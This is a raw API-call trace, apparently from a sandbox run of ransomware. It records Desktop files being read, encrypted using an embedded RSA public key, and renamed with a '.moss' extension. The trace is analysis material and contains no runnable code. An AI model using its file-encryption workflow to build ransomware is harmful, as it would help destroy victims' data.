[0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.444] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.444] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.444] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe70 [0169.444] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe88 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe58 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbea0 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe70 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b51c40 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b447b0 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.446] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b449c8 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449c8 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbea0 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45590 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51c40 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51a48 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.449] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x9211, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb14*=0x9211, lpOverlapped=0x0) returned 1 [0169.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.449] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9216, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.449] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.450] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.450] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.450] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.450] CloseHandle (hObject=0x664) returned 1 [0169.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.453] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RaJMjJJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rajmjjj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RaJMjJJ.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rajmjjj.flv.moss")) returned 1 [0169.454] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.454] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.454] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.456] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.456] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf451a900, ftCreationTime.dwHighDateTime=0x1d5d96e, ftLastAccessTime.dwLowDateTime=0xd8d1e6c0, ftLastAccessTime.dwHighDateTime=0x1d5d86c, ftLastWriteTime.dwLowDateTime=0xd8d1e6c0, ftLastWriteTime.dwHighDateTime=0x1d5d86c, nFileSizeHigh=0x0, nFileSizeLow=0x6934, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rHp2e.wav", cAlternateFileName="")) returned 1 [0169.456] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.456] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.456] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.456] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rHp2e.wav") returned=".wav" [0169.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rHp2e.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhp2e.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.457] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26932) returned 1 [0169.457] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.462] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x690e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.462] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.464] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.464] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.464] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.464] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6934, lpOverlapped=0x0) returned 1 [0169.464] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.464] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.465] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.466] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.466] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.467] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.467] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.467] GetLastError () returned 0x0 [0169.467] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.467] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.467] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.467] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.467] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.467] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.467] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x6930) returned 0x3b48820 [0169.467] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45590 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe40 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b455d8 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe58 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe88 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbea0 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.468] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.468] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4f158 [0169.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbea0 | out: hHeap=0xcd0000) returned 1 [0169.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4f158 | out: hHeap=0xcd0000) returned 1 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbea0 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe88 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbea0 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, 